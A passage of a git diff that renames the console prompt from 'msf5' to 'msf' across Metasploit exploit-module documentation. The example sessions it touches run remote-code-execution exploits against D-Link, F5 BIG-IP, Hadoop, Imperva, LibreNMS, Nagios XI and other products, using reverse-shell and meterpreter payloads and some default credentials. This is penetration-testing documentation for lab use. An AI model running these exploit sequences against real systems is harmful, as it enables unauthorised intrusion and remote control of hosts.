exploit(linux/http/cpi_tararchive_upload) > check +msf exploit(linux/http/cpi_tararchive_upload) > check [*] 192.168.0.23:8082 - The target service is running, but could not be validated. ``` **Exploiting the service** ``` -msf5 exploit(linux/http/cpi_tararchive_upload) > run +msf exploit(linux/http/cpi_tararchive_upload) > run [*] Started reverse TCP handler on 192.168.0.21:4444 [*] Uploading tar file (3072 bytes) diff --git a/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md b/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md index 27fc66ee65..72aec9a053 100644 --- a/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md +++ b/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md @@ -16,18 +16,18 @@ Vulnerable firmwares are 1.01 up to 1.03. ## Scenarios ``` -msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1 +msf > use exploit/linux/http/dlink_dsl2750b_exec_noauth +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0 +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0 LHOST => eth0 -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555 +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555 LPORT => 5555 -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > run -msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run +msf exploit(linux/http/dlink_dsl2750b_exec_noauth) > run [*] Started reverse TCP handler on 192.168.1.6:5555 [*] 192.168.1.1:80 Checking target version... diff --git a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md index 5f3ddaf253..460b4c8879 100644 --- a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md +++ b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md @@ -19,7 +19,7 @@ In addition you will probably want to set `LHOST` and `SRVHOST`. ## Payloads ``` -msf5 exploit(linux/http/dlink_dwl_2600_command_injection) > show payloads +msf exploit(linux/http/dlink_dwl_2600_command_injection) > show payloads Compatible Payloads =================== @@ -43,7 +43,7 @@ Compatible Payloads ## Scenarios ``` -msf5 exploit(linux/http/dlink_dwl_2600_command_injection) > exploit +msf exploit(linux/http/dlink_dwl_2600_command_injection) > exploit [*] Started reverse TCP handler on 192.168.0.101:4444 [*] 192.168.0.100:80 - Trying to login with admin / admin diff --git a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md index 9059bd13bb..aef6dfeee9 100644 --- a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md +++ b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md @@ -42,7 +42,7 @@ value is 1. 1. EyesOfNetwork version 5.1 ``` -msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options +msf exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce): @@ -76,7 +76,7 @@ Exploit target: 1 Linux (x64) -msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit +msf exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Target is EyesOfNetwork version 5.1. Attempting exploitation using CVE-2020-9465. @@ -93,7 +93,7 @@ msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit 2. EyesOfNetwork version 5.2 ``` -msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit +msf exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Target is EyesOfNetwork version 5.2. Attempting exploitation using CVE-2020-9465. @@ -110,7 +110,7 @@ msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit 3. EyesOfNetwork version 5.3 ``` -msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit +msf exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656. diff --git a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md index f2b8c12067..d2010c583d 100644 --- a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md +++ b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md @@ -52,9 +52,9 @@ Defaults to `/tmp`. ### F5 BIG-IP 14.1.2 in VMware Fusion ``` -msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902 +msf > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902 [*] Using configured payload linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options +msf exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902): @@ -87,11 +87,11 @@ Exploit target: 1 Linux Dropper -msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179 +msf exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179 rhosts => 172.16.249.179 -msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1 +msf exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run +msf exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index 0ebb8d378d..8b41519f5d 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -64,18 +64,18 @@ The password of the username used to authenticate on the admin page. **Default: ## Scenarios ### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. ``` -msf5 > use exploit/linux/http/geutebruck_testaction_exec -msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping +msf > use exploit/linux/http/geutebruck_testaction_exec +msf exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping payload => cmd/unix/reverse_netcat_gaping -msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root +msf exploit(linux/http/geutebruck_testaction_exec) > set httpusername root httpusername => root -msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin +msf exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin httppassword => admin -msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 +msf exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 lhost => 192.168.14.1 -msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 +msf exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 rhosts => 192.168.14.58 -msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit +msf exploit(linux/http/geutebruck_testaction_exec) > exploit [*] Started reverse TCP handler on 192.168.14.1:4444 [*] 192.168.14.58:80 - Attempting to exploit... diff --git a/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md b/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md index 546470dca1..851219dc06 100644 --- a/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md +++ b/documentation/modules/exploit/linux/http/hadoop_unauth_exec.md @@ -34,8 +34,8 @@ Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up ## Scenarios ``` -msf5 > use exploit/linux/http/hadoop_unauth_exec -msf5 exploit(linux/http/hadoop_unauth_exec) > show options +msf > use exploit/linux/http/hadoop_unauth_exec +msf exploit(linux/http/hadoop_unauth_exec) > show options Module options (exploit/linux/http/hadoop_unauth_exec): @@ -59,11 +59,11 @@ Exploit target: 0 Automatic -msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 +msf exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 rhost => 192.168.77.141 -msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(linux/http/hadoop_unauth_exec) > show options +msf exploit(linux/http/hadoop_unauth_exec) > show options Module options (exploit/linux/http/hadoop_unauth_exec): @@ -95,9 +95,9 @@ Exploit target: 0 Automatic -msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 +msf exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 lhost => 192.168.77.141 -msf5 exploit(linux/http/hadoop_unauth_exec) > exploit +msf exploit(linux/http/hadoop_unauth_exec) > exploit [*] Started reverse TCP handler on 192.168.77.141:4444 [*] Sending Command diff --git a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md index 50b273592b..4674329af2 100644 --- a/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md +++ b/documentation/modules/exploit/linux/http/hp_van_sdn_cmd_inject.md @@ -41,16 +41,16 @@ Set this to the service password. Defaults to `skyline`. ## Usage ``` -msf5 > use exploit/linux/http/hp_van_sdn_cmd_inject -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set rhosts 192.168.56.102 +msf > use exploit/linux/http/hp_van_sdn_cmd_inject +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set rhosts 192.168.56.102 rhosts => 192.168.56.102 -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set target Linux Dropper +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set target Linux Dropper target => Linux Dropper -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set lhost 192.168.56.1 +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run +msf exploit(linux/http/hp_van_sdn_cmd_inject) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Authenticating with service token AuroraSdnToken37 @@ -73,9 +73,9 @@ BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > Background session 1? [y/N] -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set token "" +msf exploit(linux/http/hp_van_sdn_cmd_inject) > set token "" token => -msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run +msf exploit(linux/http/hp_van_sdn_cmd_inject) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Authenticating with creds sdn:skyline diff --git a/documentation/modules/exploit/linux/http/ibm_drm_rce.md b/documentation/modules/exploit/linux/http/ibm_drm_rce.md index 17a4d56720..2e3f57eb50 100644 --- a/documentation/modules/exploit/linux/http/ibm_drm_rce.md +++ b/documentation/modules/exploit/linux/http/ibm_drm_rce.md @@ -28,7 +28,7 @@ A successful exploit will look like this: ``` -msf5 exploit(linux/http/ibm_drm_unauth_rce) > run +msf exploit(linux/http/ibm_drm_unauth_rce) > run [*] Started reverse TCP handler on 10.9.8.1:4444 [+] 10.9.8.213:8443 - Successfully "stickied" our session ID JQElTQxh diff --git a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md index 604d84315f..173a578925 100644 --- a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md +++ b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md @@ -22,16 +22,16 @@ Imperva SecureSphere 13.0/13.1/13.2 Imperva Secure 13.0 Pre-FTL mode: ``` -msf5 > use exploit/linux/http/imperva_securesphere_exec -msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +msf > use exploit/linux/http/imperva_securesphere_exec +msf exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 RHOST => 192.168.146.201 -msf5 exploit(linux/http/imperva_securesphere_exec) > check +msf exploit(linux/http/imperva_securesphere_exec) > check [+] 192.168.146.201:443 The target is vulnerable. -msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 +msf exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 LHOST => 192.168.146.215 -msf5 exploit(linux/http/imperva_securesphere_exec) > show options +msf exploit(linux/http/imperva_securesphere_exec) > show options Module options (exploit/linux/http/imperva_securesphere_exec): @@ -67,7 +67,7 @@ Exploit target: 0 Imperva SecureSphere 13.0/13.1/13.2 -msf5 exploit(linux/http/imperva_securesphere_exec) > exploit +msf exploit(linux/http/imperva_securesphere_exec) > exploit [*] Started reverse TCP handler on 192.168.146.215:4444 [*] Sending payload linux/x64/meterpreter/reverse_tcp @@ -113,18 +113,18 @@ meterpreter > exit Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential): ``` -msf5 > use exploit/linux/http/imperva_securesphere_exec -msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +msf > use exploit/linux/http/imperva_securesphere_exec +msf exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 RHOST => 192.168.146.201 -msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS +msf exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS PASS => lshy5782%lsLS -msf5 exploit(linux/http/imperva_securesphere_exec) > check +msf exploit(linux/http/imperva_securesphere_exec) > check [+] 192.168.146.201:443 The target is vulnerable. -msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 +msf exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 LHOST => 192.168.146.215 -msf5 exploit(linux/http/imperva_securesphere_exec) > show options +msf exploit(linux/http/imperva_securesphere_exec) > show options Module options (exploit/linux/http/imperva_securesphere_exec): @@ -160,7 +160,7 @@ Exploit target: 0 Imperva SecureSphere 13.0/13.1/13.2 -msf5 exploit(linux/http/imperva_securesphere_exec) > exploit +msf exploit(linux/http/imperva_securesphere_exec) > exploit [*] Started reverse TCP handler on 192.168.146.215:4444 [*] Sending payload linux/x64/meterpreter/reverse_tcp diff --git a/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md b/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md index d45dff16fd..0786077a96 100644 --- a/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md +++ b/documentation/modules/exploit/linux/http/librenms_addhost_cmd_inject.md @@ -31,16 +31,16 @@ ### Tested on LibreNMS 1.46 on Ubuntu 18.04 ``` - msf5 > use exploit/linux/http/librenms_addhost_cmd_inject - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143 + msf > use exploit/linux/http/librenms_addhost_cmd_inject + msf exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143 rhosts => 192.168.37.143 - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah + msf exploit(linux/http/librenms_addhost_cmd_inject) > set username blah username => blah - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password + msf exploit(linux/http/librenms_addhost_cmd_inject) > set password password password => password - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1 + msf exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run + msf exploit(linux/http/librenms_addhost_cmd_inject) > run [*] Started reverse TCP double handler on 192.168.37.1:4444 [*] Successfully logged into LibreNMS diff --git a/documentation/modules/exploit/linux/http/librenms_collectd_cmd_inject.md b/documentation/modules/exploit/linux/http/librenms_collectd_cmd_inject.md index 31336893f7..f97070c1d3 100644 --- a/documentation/modules/exploit/linux/http/librenms_collectd_cmd_inject.md +++ b/documentation/modules/exploit/linux/http/librenms_collectd_cmd_inject.md @@ -90,20 +90,20 @@ ### Tested on LibreNMS `v1.46` ``` - msf5 > use exploit/linux/http/librenms_collectd_cmd_inject - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set rhosts 192.168.37.133 + msf > use exploit/linux/http/librenms_collectd_cmd_inject + msf exploit(linux/http/librenms_collectd_cmd_inject) > set rhosts 192.168.37.133 rhosts => 192.168.37.133 - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set username blah + msf exploit(linux/http/librenms_collectd_cmd_inject) > set username blah username => blah - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set password password + msf exploit(linux/http/librenms_collectd_cmd_inject) > set password password password => password - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set payload cmd/unix/reverse + msf exploit(linux/http/librenms_collectd_cmd_inject) > set payload cmd/unix/reverse payload => cmd/unix/reverse - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > set lhost 192.168.37.1 + msf exploit(linux/http/librenms_collectd_cmd_inject) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > check + msf exploit(linux/http/librenms_collectd_cmd_inject) > check [*] 192.168.37.133:80 - The target service is running, but could not be validated. - msf5 exploit(linux/http/librenms_collectd_cmd_inject) > run + msf exploit(linux/http/librenms_collectd_cmd_inject) > run [*] Started reverse TCP double handler on 192.168.37.1:4444 [*] Successfully logged into LibreNMS. Storing credentials... diff --git a/documentation/modules/exploit/linux/http/linuxki_rce.md b/documentation/modules/exploit/linux/http/linuxki_rce.md index 01e7bd983b..fc8f5295e0 100644 --- a/documentation/modules/exploit/linux/http/linuxki_rce.md +++ b/documentation/modules/exploit/linux/http/linuxki_rce.md @@ -31,8 +31,8 @@ Override check result. ## Scenarios ### LinuxKI Toolset v6.01 on CentOS 7.8 ``` -msf5 > use exploit/linux/http/linuxki_rce -msf5 exploit(linux/http/linuxki_rce) > show targets +msf > use exploit/linux/http/linuxki_rce +msf exploit(linux/http/linuxki_rce) > show targets Exploit targets: @@ -44,11 +44,11 @@ Exploit targets: 3 Automatic (Linux Dropper) -msf5 exploit(linux/http/linuxki_rce) > set rhosts 192.168.1.43 +msf exploit(linux/http/linuxki_rce) > set rhosts 192.168.1.43 rhosts => 192.168.1.43 -msf5 exploit(linux/http/linuxki_rce) > set rport 32769 +msf exploit(linux/http/linuxki_rce) > set rport 32769 rport => 32769 -msf5 exploit(linux/http/linuxki_rce) > run +msf exploit(linux/http/linuxki_rce) > run [*] Started reverse TCP handler on 192.168.1.43:4444 [*] Executing Automatic (PHP In-Memory) target @@ -64,11 +64,11 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.43 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(linux/http/linuxki_rce) > set target 1 +msf exploit(linux/http/linuxki_rce) > set target 1 target => 1 -msf5 exploit(linux/http/linuxki_rce) > unset payload +msf exploit(linux/http/linuxki_rce) > unset payload Unsetting payload... -msf5 exploit(linux/http/linuxki_rce) > run +msf exploit(linux/http/linuxki_rce) > run [*] Started reverse TCP handler on 192.168.1.43:4444 [*] Executing Automatic (PHP Dropper) target @@ -85,11 +85,11 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.43 - Meterpreter session 2 closed. Reason: User exit -msf5 exploit(linux/http/linuxki_rce) > set target 2 +msf exploit(linux/http/linuxki_rce) > set target 2 target => 2 -msf5 exploit(linux/http/linuxki_rce) > set payload cmd/unix/reverse_bash +msf exploit(linux/http/linuxki_rce) > set payload cmd/unix/reverse_bash payload => cmd/unix/reverse_bash -msf5 exploit(linux/http/linuxki_rce) > run +msf exploit(linux/http/linuxki_rce) > run [*] Started reverse TCP handler on 192.168.1.43:4444 [*] Executing Automatic (Unix In-Memory) target @@ -100,11 +100,11 @@ uname -a Linux 36503ef4f463 4.19.76-linuxkit #1 SMP Fri Apr 3 15:53:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux exit [*] 192.168.1.43 - Command shell session 3 closed. -msf5 exploit(linux/http/linuxki_rce) > set target 3 +msf exploit(linux/http/linuxki_rce) > set target 3 target => 3 -msf5 exploit(linux/http/linuxki_rce) > unset payload +msf exploit(linux/http/linuxki_rce) > unset payload Unsetting payload... -msf5 exploit(linux/http/linuxki_rce) > run +msf exploit(linux/http/linuxki_rce) > run [*] Started reverse TCP handler on 192.168.1.43:4444 [*] Executing Automatic (Linux Dropper) target @@ -123,5 +123,5 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 172.17.0.2 - Meterpreter session 4 closed. Reason: User exit -msf5 exploit(linux/http/linuxki_rce) > +msf exploit(linux/http/linuxki_rce) > ``` diff --git a/documentation/modules/exploit/linux/http/mailcleaner_exec.md b/documentation/modules/exploit/linux/http/mailcleaner_exec.md index 7c7859521c..ea6311c9ae 100644 --- a/documentation/modules/exploit/linux/http/mailcleaner_exec.md +++ b/documentation/modules/exploit/linux/http/mailcleaner_exec.md @@ -25,16 +25,16 @@ A successful check of the exploit will look like this: ## Scenarios ``` -msf5 > use exploit/linux/http/mailcleaner_exec -msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 +msf > use exploit/linux/http/mailcleaner_exec +msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 RHOSTS => 12.0.0.100 -msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 +msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 -msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin +msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin USERNAME => admin -msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD +msf exploit(linux/http/mailcleaner_exec) > set PASSWORD PASSWORD => qwe123 -msf5 exploit(linux/http/mailcleaner_exec) > run +msf exploit(linux/http/mailcleaner_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Performing authentication... @@ -51,18 +51,18 @@ meterpreter > You can also use cmd payloads. ``` -msf5 > use exploit/linux/http/mailcleaner_exec -msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 +msf > use exploit/linux/http/mailcleaner_exec +msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 RHOSTS => 12.0.0.100 -msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 +msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 -msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin +msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin USERNAME => admin -msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD -msf5 exploit(linux/http/mailcleaner_exec) > set target 1 -msf5 exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse +msf exploit(linux/http/mailcleaner_exec) > set PASSWORD +msf exploit(linux/http/mailcleaner_exec) > set target 1 +msf exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse payload => cmd/unix/reverse -msf5 exploit(linux/http/mailcleaner_exec) > run +msf exploit(linux/http/mailcleaner_exec) > run [*] Started reverse TCP double handler on 12.0.0.1:4444 [*] Performing authentication... diff --git a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md index e5b3ae3131..8d98e8603e 100644 --- a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md +++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md @@ -90,12 +90,12 @@ A successful check of the exploit will look like this: ## Scenarios ``` -msf5 > use exploit/linux/http/microfocus_secure_messaging_gateway -msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set RHOSTS 12.0.0.25 +msf > use exploit/linux/http/microfocus_secure_messaging_gateway +msf exploit(linux/http/microfocus_secure_messaging_gateway) > set RHOSTS 12.0.0.25 RHOSTS => 12.0.0.25 -msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set LHOST 12.0.0.1 +msf exploit(linux/http/microfocus_secure_messaging_gateway) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 -msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run +msf exploit(linux/http/microfocus_secure_messaging_gateway) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Creating an user with appropriate privileges diff --git a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.md b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.md index 894e3a2ce1..2c8fdf524a 100644 --- a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.md +++ b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.md @@ -26,10 +26,10 @@ ### Nagios 5.2.7 on CentOS 6.7 ``` -msf5 > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo -msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhost 172.22.222.182 +msf > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo +msf exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhost 172.22.222.182 rhost => 172.22.222.182 -msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run +msf exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run [*] Started reverse TCP handler on 172.22.222.177:4444 [*] Command Stager progress - 100.00% done (705/705 bytes) diff --git a/documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md b/documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md index 9b6ceb04e4..3893d12ddc 100644 --- a/documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md +++ b/documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md @@ -41,8 +41,8 @@ This executes a Python payload. ### Netsweeper 6.4.3 ISO, based on CentOS Linux ``` -msf5 > use exploit/linux/http/netsweeper_webadmin_unixlogin -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > options +msf > use exploit/linux/http/netsweeper_webadmin_unixlogin +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > options Module options (exploit/linux/http/netsweeper_webadmin_unixlogin): @@ -72,11 +72,11 @@ Exploit target: 0 Python -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.157 +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.157 rhosts => 172.16.249.157 -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set lhost 172.16.249.1 +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > run +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > run [*] Started HTTPS reverse handler on https://172.16.249.1:8443 [*] Executing automatic check (disable AutoCheck to override) @@ -101,9 +101,9 @@ meterpreter > ### Netsweeper 6.4.4 ISO, based on CentOS Linux ``` -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.160 +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.160 rhosts => 172.16.249.160 -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > run +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > run [*] Started HTTPS reverse handler on https://172.16.249.1:8443 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md index f4973aa476..1afa4fee2d 100644 --- a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md +++ b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md @@ -83,8 +83,8 @@ password is randomized on install. ### Nexus Repository Manager 